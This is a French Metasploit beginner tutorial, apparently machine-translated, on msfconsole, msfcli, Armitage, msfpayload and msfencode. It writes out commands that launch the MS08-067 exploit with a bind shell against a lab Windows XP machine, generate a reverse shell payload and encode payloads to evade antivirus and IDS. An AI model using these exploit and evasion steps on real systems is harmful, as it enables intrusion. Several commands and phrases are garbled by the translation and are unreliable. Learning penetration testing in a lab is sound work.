Tutorial Metasploit: Introduction
1- Metasploit Terms
2- Msfconsole
3- Msfcli
4- Armitage
5- MSFpayload
6- MSFencode
Metasploit est un outil précieux pour tester un réseau de plume. Cependant, il peut être très déroutant pour un débutant. Ces tutoriels metaspolit vous aidera à se lever et courir avec Metasploit. La plupart de nos piratage sera ciblée sur les machines Windows. Comme un avertissement de rappel et le site: je ne suis pas responsable de vos actes! C'est seulement pour l'éducation!
Lecture recommandée: Metasploit: Le Guide du testeur de pénétration de
Un livre qui va vous montrer la majeure partie du Framework Metasploit. Cependant, il vous laisse découvrir la véritable puissance de Metasploit pour vous-même. Dans l'ensemble, hautement recommandé.
1- Metasploit Terms
Exploit - profiter d'une faille de sécurité dans un système, réseau ou application.
Payload - est le code que notre ordinateur de la victime à exécuter par le Framework Metasploit.
Module - un petit morceau de code qui peut être ajouté à la Metasploit Framework pour exécuter une attaque.
Shellcode - un petit morceau de code utilisé en tant que payload.
2- Msfconsole
Msfconsole est une interface tout-en-un à la plupart des fonctionnalités de Metasploit. Msfconsole peut être utilisé pour lancer des attaques, création d'auditeurs, et beaucoup, beaucoup plus. Nous allons utiliser tout au long de msfconsole ces tutoriels, mais la maîtrise il vous permettra de suivre l'évolution rapide metaspolits cadre. Metasploit est installé par défaut sur backtrack 5. Pour accéder à msfconsole, ouvrez votre console et tapez:
root @ bt: ~ # cd / opt/framework3/msf3 /
root @ bt: ~ # / # opt/framework3/msf3 msfconsole
Après quelque temps, le msfconsole va démarrer.
Pour afficher les fichiers d'aide, il suffit de taper help suivi de la commande que vous voulez en savoir plus sur. Dans notre cas, nous voulons apprendre à propos de la commande de connexion. La commande connect nous permet de communiquer avec un hôte.
msf > help connect
3- Msfcli
Msfcli est une autre façon d'accéder à la Metasploit Framework, mais se concentre davantage sur les scripts et l'intelligibilité de la console avec d'autres outils basés. Pour afficher le type d'aide msfcli:
root @ bt: ~ # cd / opt/framework3/msf3
root @ bt: ~ # msfcli-h
Maintenant, nous allons faire un petit test de fonctionner de msfcli. Il est important de noter à chaque fois que vous apprenez Metasploit et vous êtes coincé, vous pouvez voir les options dans un module en ajoutant la lettre S à la fin de la ligne. Par exemple:
root@bt:~# msfcli windows/smb/ms08_067_netapt o
Ce module nécessite trois options: RHOST, RPORT et SMPIPE. Ajout P à la fin nous permet de voir ce que nous pouvons utiliser des charges utiles.
root @ bt ~ # msfcli windows/smb/ms08_067_netapi RHOST = 192.168.56.101 P
nous pouvons exécuter notre exploit en sélectionnant une charge, remplissez les options et exécutez-le en passant la lettre E à la nie de la chaîne d'arguments msfcli.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E
Remarque: l'adresse IP attribuée à RHOST est une machine Windows XP que j'ai sur une machine virtaul. Il agira comme notre machine de la victime pour les tests. Vous devrez faire la même chose avec un autre ordinateur ou une machine virtuelle. Pour la pratique, ne mettez pas à jour votre ordinateur de la victime ou installer un logiciel anti-virus. Nous voulons être en mesure d'utiliser nos exploits sans qu'ils soient corrigés au cours des mises à jour Windows. Nous allons passer en revue ce plus en profondeur plus tard.
4- Armitage
La composante Armitage est une interface utilisateur entièrement graphique interactive.
Exécution Armitage
Exécutez la commande armitage.
Sélectionnez Démarrer MSF.
5- MSFpayload
La composante msfpayload de Metasploit qui génère shellcode, et les exécutables. Shellcoe peut BEW généré dans de nombreux formats, y compris C, Ruby, Javascript et même Visuabl de base. Chaque sortie sera utile dans diverses situations.
Pour le type d'aide msfpayload: root@bt~# msfpayload -h
Tout comme msfcli, si vous avez besoin de savoir les options requises, ajoutez la lettre O sur la ligne de commande.
root@bt:~# msfpayload windows/shell_reverse_tcp O
6- MSFencode
Le shellcode généré par msfpayload est fonctionnel, mais il contient plusieurs caractères nuls qui, lorsqu'elle est interprétée par de nombreux programmes, signifient la fin d'une chaîne, ce qui provoquera le code de résilier avant la fin.
En outre, shellcode traversant un réseau en clair est susceptible d'être ramassé par les systèmes de détection d'intrusion (IDS) et les logiciels antivirus. Pour résoudre ce problème, les développeurs offrent Metasploit msfencode, qui vous aide à éviter les mauvais caractères et d'échapper antivirus et IDS en codant les données utiles originales d'une manière qui ne comprend pas "mauvais" caractères.
Entrez msfencode-h pour voir une liste d'options msfencode.
Metasploit contient un certain nombre de codeurs différents pour des situations différentes. Certains seront utiles lorsque vous ne pouvez utiliser que des caractères alphanumériques dans le cadre d'une charge utile, comme c'est le cas avec de nombreux exploits de formats de fichiers ou d'autres applications qui acceptent des caractères imprimables uniquement en entrée, tandis que d'autres sont de grands capteurs à usage général qui réussissent bien dans toutes les situations . Un encodeur très populaire et bien connue est le: codeur x86/shikata_ga_nai.
Pour voir la liste des encodeurs disponibles, ajoutez-l pour msfencode comme illustré ci-dessous. Les charges utiles sont classés par ordre de fiabilité.
root @ bt: ~ # msfencode-l